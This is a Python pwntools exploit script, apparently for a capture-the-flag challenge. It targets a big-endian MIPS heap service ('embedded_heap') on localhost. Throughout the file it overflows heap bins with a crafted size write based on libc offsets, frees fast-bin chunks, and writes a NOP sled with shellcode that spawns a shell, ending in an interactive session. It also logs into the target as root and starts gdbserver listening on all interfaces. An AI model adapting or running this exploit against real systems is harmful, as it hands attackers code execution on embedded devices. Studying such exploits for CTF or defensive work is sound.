@theKidOfArcrania
Created June 13, 2019 17:00
from pwn import *
context.update(arch='mips', endian='big')  # target binary is big-endian MIPS
sc = shellcraft  # short alias used by exploit()
import sys
# Offsets used by exploit() to compute the index it writes. They are taken
# as given for the target's libc build and are not derived in this script.
libc_mstate = 0x66d7c
libc_fn_off = 0x7f064
def chk_size(num):
    """Return ``num`` plus a 4-byte header, rounded up to a multiple of 8.

    The result is clamped to at least 0x10. From the name this appears to
    mirror the target allocator's chunk sizing, but that is inferred, not
    shown by this script.
    """
    minimum = 0x10
    # +4 for the header, +7 then mask off the low bits to round up to 8
    rounded = (num + 4 + 7) & ~7
    if rounded > minimum:
        return rounded
    return minimum
def choice(ch):
    """Answer the menu prompt on the global connection ``p`` with option ``ch``."""
    prompt = 'Command: '
    answer = str(ch)
    p.sendlineafter(prompt, answer)
def update(ind, data):
    """Drive the target's update dialog on the global connection ``p``.

    Sends the index, then the byte length of ``data``, then ``data`` itself.
    """
    p.sendlineafter('Index: ', str(ind))
    size = len(data)
    p.sendlineafter('Size: ', str(size))
    # Content goes out raw (no trailing newline): callers pass packed binary.
    p.sendafter('Content: ', data)
def free(ind):
    """Answer the index prompt on the global connection ``p`` with ``ind``."""
    answer = str(ind)
    p.sendlineafter('Index: ', answer)
def _read_chunk_size():
    """Consume one ``: <n> bytes`` field from ``p`` and return chk_size(n)."""
    p.recvuntil(': ')
    raw = p.recvuntil(' bytes', drop=True)
    return chk_size(int(raw))


def exploit():
    """Run the interaction against the global connection ``p``.

    Reads three size fields from the banner, sends the overflowing update,
    frees two entries, writes the shellcode and then hands the session to
    the user. ``chk_size``, ``choice``, ``update`` and ``free`` are the
    module-level helpers.
    """
    a = _read_chunk_size()
    b = _read_chunk_size()
    _read_chunk_size()  # third size is consumed but not used
    # Overflow heap bins
    choice(1)
    ind = (libc_fn_off - (libc_mstate + 4)) // 4 + 2
    overflow = ''.join([
        'a' * (a - 4),
        p32(ind * 8),
        'b' * (b - 4),
        p32(9),
        'cccc',
    ])
    update(0, overflow)
    # Pwn, free the fast bins, and then write shellcode
    choice(3)
    free(2)
    free(1)
    pause()  # manual checkpoint before the final write
    nops = asm(sc.nop()) * ((a // 4) - 2)
    exp = nops + asm(sc.sh())
    update(0, exp)
    p.interactive()
def login():
    """Start ``./run.sh``, log in as root and publish the session as global ``tty``."""
    global tty
    tty = process('./run.sh')
    session = tty
    session.recvuntil('login: ')
    session.info('Got login screen')
    session.sendline('root')
    # The shell prompt is taken as the signal that login completed.
    session.recvuntil('#')
    session.success('Ready!')
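if __name__ == '__main__':
    # Entry point: pick the target from the last CLI argument, then run
    # exploit(). On any error the connection is handed to the user before
    # the exception propagates.
    p = None
    try:
        mode = sys.argv[-1]
        if mode == 'remote':
            # Attach to an already-running server.
            p = remote('localhost', 1235)
        elif mode == 'local':
            login()
            tty.sendline('/server 1235 /embedded_heap')
            p = remote('localhost', 1235)
        elif mode == 'debug':
            login()
            # Note: gdbserver is told to listen on all interfaces (0.0.0.0:1234).
            tty.sendline('/server 1235 gdbserver 0.0.0.0:1234 /embedded_heap')
            p = remote('localhost', 1235)
        else:
            raise ValueError('Give an option')
        exploit()
    except BaseException:
        # BaseException (not Exception) so a KeyboardInterrupt also drops
        # into interactive mode; a bare `except:` would do the same but is
        # flagged by linters. The exception is always re-raised afterwards.
        if p:
            p.interactive()
        raise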